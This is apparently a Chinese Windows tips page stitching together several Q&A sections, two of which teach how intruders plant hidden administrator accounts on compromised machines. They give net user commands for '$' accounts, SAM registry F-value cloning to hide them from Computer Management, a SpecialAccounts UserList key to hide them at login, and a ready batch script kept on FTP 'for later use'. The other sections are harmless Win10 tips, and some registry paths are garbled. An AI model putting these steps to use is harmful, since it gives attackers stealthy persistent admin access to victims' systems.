windows之家1.Windows系统的账户隐藏是什?
当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。
在肉鸡上建立一个隐藏的账户,以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这种黑客常用的技术进行揭密。
在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户。在系统中可以进入“命令提示符”,控制面板的“计算机管理”,“注册表”中对存在的账户进行查看,而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常,因此如何让系统账户在这两者中隐藏将是本文的重点。
一、“命令提示符”中的阴谋 其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。 点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user piao$Content$nbsp;123456 /add”,回车,成功后会显示“命令成功完成”。
接着输入“net localgroup administrators piao$Content$nbsp;/add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了管理员权限。 我们来看看隐藏账户的建立是否成功。
在“命令提示符”中输入查看系统账户的命令“net user”,回车后会显示当前系统中存在的账户。从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。
接着让我们进入控制面板的“管理工具”,打开其中的“计算机”,查看其中的“本地用户和组”,在“用户”一项中,我们建立的隐藏账户“piao$”暴露无疑。 可以总结得出的结论是:这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。
因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。 二、在“注册表”中玩转账户隐藏 从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显,很容易暴露自己。
那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在“注册表”中进行一番小小的设置,就可以让系统账户在两者中完全蒸发。 1、峰回路转,给管理员注册表操作权限 在注册表中对系统账户的键值进行操作,需要到“HKEY_LOCAL_MACHINESAMSAM”处进行修改,但是当我们来到该处时,会发现无法展开该处所在的键值。
这是因为系统默认对系统管理员给予“写入”和“读取控制”权限,没有给予修改权限,因此我们没有办法对“SAM”项下的键值进行查看和修改。不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。
点击“开始”→“运行”,输入“regedt32。 exe”后回车,随后会弹出另一个“注册表编辑器”,和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权限(为便于理解,以下简称regedt32。
exe)。在regedt32。
exe中来到“HKEY_LOCAL_MACHINESAMSAM”处,点击“安全”菜单→“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成后点击“确定”即可。 然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINESAMSAM”下面的键值都可以展开了。
提示:上文中提到的方法只适用于Windows NT/2000系统。在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择“权限”即可。
2、偷梁换柱,将隐藏账户替换为管理员 成功得到注册表操作权限后,我们就可以正式开始隐藏账户的制作了。来到注册表编辑器的“HKEY_LOCAL_”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。
点击我们的隐藏账户“piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在“000003E9”这一项中。 同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。
将“piao$”的键值导出为“piao$。reg”,同时将“000003E9”和“000001F4”项的F键值分别导出为user。
reg,admin。reg。
用“记事本”打开admin。reg,将其中“F”值后面的内容复制下来,替换user。
reg中的“F”值内容,完成后保存。接下来进入“命令提示符”,输入“net user piao$Content$nbsp;/del”将我们建立的隐藏账户删除。
最后,将piao$。reg和user。
reg导入注册表,至此,隐藏账户制作完成。 3、过河拆桥,切断删除隐藏账户的途径 虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了,但是有经验的系统管理员仍可能通过注册表编。
2.Win10专业版下如何开启被隐藏的登陆界面呢?
第一步、首先,咱们返回到win10系统的传统桌面位置,之后,咱们同时按下win10电脑键盘上的win+R快捷键打开电脑的运行窗口,在打开的运行窗口中,咱们输入regedit并单击回车,这样就可以打开Win10专业版的注册表编辑器窗口了。
第二步、在打开的注册表编辑器窗口中,咱们依次点击展开左侧窗口中的HKEY_LOCAL_。 第三步、接下来,咱们找到并双击右侧窗口中的Threshold键值,然后在弹出来的编辑窗口中,咱们将默认的数值数据修改为1,然后点击确定保存设置即可。
3.Win10如何查看隐藏文件夹呢?
有些文件或文件夹是不显示在文件夹窗口中的,如系统文件、隐藏文件等。
如果需要修改或删除这些文件或文件夹,则首先必须将它们显示出来。 在任意文件夹的上方单击“工具”菜单下的“选项”,打开“文件夹选项”对话框。
单击“査看”选项卡,在高级设置”下拉列表框中,选择“隐藏的文件和文件夹”,单击“显示隐藏的文件、文件夹、驱动器”选钮。 如果要显示“受保护的操作系统文件”,可以清除“隐藏受保护的系统文件(推荐)”复选框。
这时系统会显示警告信息,在警告信息框中单击【是】按钮。 以上就是装机之家分享的Win10如何查看隐藏文件夹和文件,希望大家会喜欢。
4.Win10系统的十大隐藏功能是什么呢
1、非活动窗口鼠标滚动效果这项功能可以让你在非活动窗口上使用鼠标滚轮的滚动翻页功能。
如此一来,你可以不必点击需要滚动的非活动窗口,但可以对其页面内容进行滚动翻页操作。该功能在某些第三方软件中已经实现,现在微软正式在设置中加入该功能的调节开关,非常方便。
2、可为多显示器系统设置不同缩放标准有些用户由于工作需要可能为一台电脑配置了两台以上的显示器,而且每台显示器的尺寸和分辨率都不尽相同。在之前的系统中,Windows对于这种情况只能采取一视同仁的处理方式,导致有些显示器的显示效果并不理想。
现在,微软在Win10显示设置中为这些用户的每台显示器都提供了图像缩放调节功能,使得用户在每种显示器下都能很好的读出显示文字和内容。 3、存储使用情况(存储感知)你可以在此获知目前各个分区存储内容的分布情况,由此可对各个分区的存储情况进行合理掌控。
4、更易用的命令提示符在命令提示符属性中可以看到多了许多人性化选项,这使得该功能更适合普通用户使用。比如平时文本编辑的某些功能键设定也应用到这款程序中。
另外,在颜色选项卡中还可以设定窗口透明度。 5、全新的触控板手势在Win10中的触控板手势共有三大类,分别为任务视图、Alt+Tab组合键以及显示桌面,均为多指组合配合使用。
6、Edge浏览器手写注释外媒把这项功能算进来貌似有点牵强,微软在宣传Edge浏览器时很强势的介绍过这项代表性功能。所以算作高曝光度功能还比较合适。
7、支持flac、mkv和hevc等高清格式这一项也勉强算作是隐藏功能吧,毕竟微软没有像Edge浏览器那样大张旗鼓的宣传。 不过微软官方宣布这类消息还是比较早的,2014年Win10预览版开发阶段就已经加入了这些支持。
8、Aero Snap窗口布局微软曾经在博客中专门介绍过Win10的升级版Aero Snap功能。和Win7/Win8。
1不同的是,Win10版加入了很多新功能,比如窗口在屏幕四角停靠等。 9、Xbox屏幕录制这项功能可以让Xbox应用得到更广泛应用。
这项录屏功能本来是用在游戏录制上,但如果你想用该功能录制非游戏屏幕也可以实现。不过该功能对显卡型号有要求,低端显卡基本无缘。
10、DirectX 12要说这是隐藏功能反正是没办法直接使用,都是配合游戏实现的。 各种消息都表明,最新的DX12可以让Win10的游戏性能大幅提升,画面更加精致细腻,让玩家有身临其境之感。
不过前提是,你得有一款能支持DX12的显卡,而且低端显卡貌似也没什么效果。
5.WIN10如何隐藏Adminstor账户
1.技巧用途:在计算机中创建一个隐藏的账户,同时也可作为远程登录的用户来远控计算机或者查看计算机的磁盘信息。
(在虚拟机中进行演示)2.使用环境: 宿主机:windows xp sp3虚拟机:Vmware workstation下的windows xp sp33.使用的工具: A.系统工具: Regedit.exe Cmd.exe B.自建的批处理和注册表: 开启账户及添加隐藏注册表.bat 关闭账户及删除隐藏注册表.bat4.过程步骤:1.本地创建隐藏账户和建立隐藏“登录时账户显示”的注册表文件。net user admin$ admin /add ---在计算机中创建一个用户名为admin$,密码为admin的账户,此时建立的这个带$的账户是隐藏的。
我们可以在cmd中运行net user,可以看到我们发现不了这个用户。打开“计算机管理”中的“本地用户和组”--“用户”中则可以看到存在admin$的账户。
net localgroup administrators admin$ /add ----将admin账户添加到管理员组中,便于以后对计算机进行控制。至此,本地计算机的隐藏账户建立好了。
下面我们注销计算机,在计算机的登录界面还是可以看到这个admin$的账户。那么,如何才能将登录界面的admin$账户也隐藏掉呢?此时我们可以进入注册表中新建一个键,就可以将其隐藏了。
键为:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] 中新建一个dword类型的名为admin$的键,其键值为"admin$"=dword:00000000快速打开方法为,在注册表编辑器regedit.exe中的菜单栏“编辑”中“查找”userlist,查找两次就可以快速定位userlist这个键值了。保存userlist下的键值为"yincang.reg",便于下面的批处理时使用。
注销计算机,可以发现,此时admin$账户看不到了。至此,在cmd下的net user和系统登录界面中都看不到admin$的影子了。
唯一可以看到的是计算机管理中的用户下还是可以看到。我们说一般的用户是不会去查看最后一个地方的,这样我们就创建了一个相对隐藏较深的计算机账户。
下面我们先删除掉以上的设置。 删除用户,删除注册表键值。
2.批处理编写 创建隐藏账户和添加进入注册表 “开启账户及添加隐藏注册表.bat ”@echo offnet user admin$ admin /add >nulnet localgroup administrators admin$ /add >nulecho Windows Registry Editor Version 5.00 >>tmp.reg >nulecho. >>tmp.reg >nulecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >>tmp.reg >nulecho "admin$"=dword:00000000 >>tmp.reg >nulecho. >>tmp.reg >nulregedit /s tmp.reg >nuldel tmp.reg >nul删除隐藏账户和删除注册表相关隐藏信息 “关闭账户及删除隐藏注册表.bat”@echo off net user admin$ /del >nulreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "admin$" /f >nul有了以上两个批处理文件之后,我们就可以留下它们放在自己的网络空间上或者ftp空间中,随时备用,适当的时候可以在受控的计算机中创建一个隐藏的账户,以便我们下次使用这台受控的计算机上的资源。
转载请注明出处windows之家 » 如何查看win10隐藏账户